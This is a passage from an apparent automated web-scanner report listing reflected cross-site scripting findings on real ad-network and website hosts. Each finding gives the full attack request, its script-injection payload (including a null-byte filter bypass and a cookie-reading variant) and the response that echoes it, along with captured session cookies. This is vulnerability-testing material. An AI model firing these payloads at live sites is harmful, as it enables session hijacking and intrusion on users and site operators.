Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 986
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=552
Expires: Fri, 28 Jan 2011 16:54:00 GMT
Date: Fri, 28 Jan 2011 16:44:48 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/c5;referrer='+document.referrer+';tag=c7.zedo.com/bar/v16-401/c5/jsc/fmr.js;qs=2b427'-alert(1)-'52c0c108d3d=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

4.247. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dd9d'%3balert(1)//443920a6ea7 was submitted in the q parameter. This input was echoed as 6dd9d';alert(1)//443920a6ea7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=6dd9d'%3balert(1)//443920a6ea7&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

4.248. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8120d"%3balert(1)//0d14a65187a was submitted in the q parameter. This input was echoed as 8120d";alert(1)//0d14a65187a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=8120d"%3balert(1)//0d14a65187a&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=43
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:07 GMT
Connection: close
Content-Length: 1928

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='8120d";alert(1)//0d14a65187a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=8120d";alert(1)//0d14a65187a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=69;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + Math.
...[SNIP]...

4.249. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5433f"><script>alert(1)</script>d728cbd751f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5433f"><script>alert(1)</script>d728cbd751f=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:06 GMT
Connection: close
Content-Length: 22643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="cafr" title="Fran..ais (Canada)" href="http://cafr.imlive.com/" onclick="dAccess('http://cafr.imlive.com/?5433f"><script>alert(1)</script>d728cbd751f=1');return false;" lang="fr-CA" hreflang="fr-CA">
...[SNIP]...

4.250. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d05ee"><script>alert(1)</script>a1533097529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d05ee"><script>alert(1)</script>a1533097529 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /?%00d05ee"><script>alert(1)</script>a1533097529=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=cewkwz45egz5sj55nckzfefj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cewkwz45egz5sj55nckzfefj; path=/; HttpOnly
Set-Cookie: spvdr=vd=60d7fb6d-8833-413b-b606-2c070cf64a07&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:53 GMT
Connection: close
Content-Length: 20012
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%00d05ee"><script>alert(1)</script>a1533097529~1');return false;">
...[SNIP]...

4.251. http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b38ec'-alert(1)-'84ce48297e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?b38ec'-alert(1)-'84ce48297e3=1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=4g5le3unzktql15523j4vgvl; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4g5le3unzktql15523j4vgvl; path=/; HttpOnly
Set-Cookie: spvdr=vd=ed834416-472f-4af7-b757-36e07f79cd57&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:54 GMT; path=/
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:16:54 GMT
Connection: close
Content-Length: 19533
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=cafr.imlive.com&ul=/?b38ec'-alert(1)-'84ce48297e3=1&qs=b38ec'-alert(1)-'84ce48297e3=1&qs=b38ec'-alert(1)-'84ce48297e3=1&iy=dallas&id=44&iu=1&vd=ed834416-472f-4af7-b757-36e07f79cd57';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.252. http://cafr.imlive.com/waccess/ [cbname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd05a"><script>alert(1)</script>cbe3a729d46 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=fd05a"><script>alert(1)</script>cbe3a729d46&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:00 GMT
Connection: close
Content-Length: 23731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=fd05a"><script>alert(1)</script>cbe3a729d46&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.253. http://cafr.imlive.com/waccess/ [from parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8372"><script>alert(1)</script>d63676c4113 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=a8372"><script>alert(1)</script>d63676c4113&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:05 GMT
Connection: close
Content-Length: 23731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=a8372"><script>alert(1)</script>d63676c4113&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.254. http://cafr.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b90b7'onerror%3d'alert(1)'58d5403e5f1 was submitted in the gotopage parameter. This input was echoed as b90b7'onerror='alert(1)'58d5403e5f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=b90b7'onerror%3d'alert(1)'58d5403e5f1 HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQQDTD=FAMDOIMABGHKKJABIPAJKPBJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:03 GMT
Connection: close
Content-Length: 8309
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=cafr.imlive.com&ul=/waccess/b90b7'onerror='alert(1)'58d5403e5f1/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://cafr.imlive.com:80/waccess/b90b7'onerror='alert(1)'58d5403e5f1/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.255. http://cafr.imlive.com/waccess/ [promocode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cafr.imlive.com
Path:	/waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 980ab"><script>alert(1)</script>eacf27c2ca8 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: cafr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=1caf2e8c-d394-4b4b-8d42-4522f3acd241&sgid=0&tid=0; __utmz=125671448.1296227257.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=125671448.1984707985.1296227257.1296227257.1296227257.1; __utmc=125671448; __utmb=125671448.1.10.1296227257; ASP.NET_SessionId=yu2e5055awk4st45vhvswz45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: icafr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:56 GMT
Connection: close
Content-Length: 23731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583980ab"><script>alert(1)</script>eacf27c2ca8&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.256. http://cbs6albany.oodle.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cbs6albany.oodle.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ba1c"><script>alert(1)</script>0fdede783fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2ba1c"><script>alert(1)</script>0fdede783fa=1 HTTP/1.1
Host: cbs6albany.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Sat, 29 Jan 2011 05:24:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=980e86cbd3ae2db21de9f81835b23291; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=bca0eed19e9a8884cb1df9b5e717aa78; path=/; domain=.oodle.com
Set-Cookie: a=dT1DM0VBNTdFQTRENDNBNDlE; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYyNzg2ODU7fQ%3D%3D; path=/; domain=.oodle.com
Content-Length: 101695

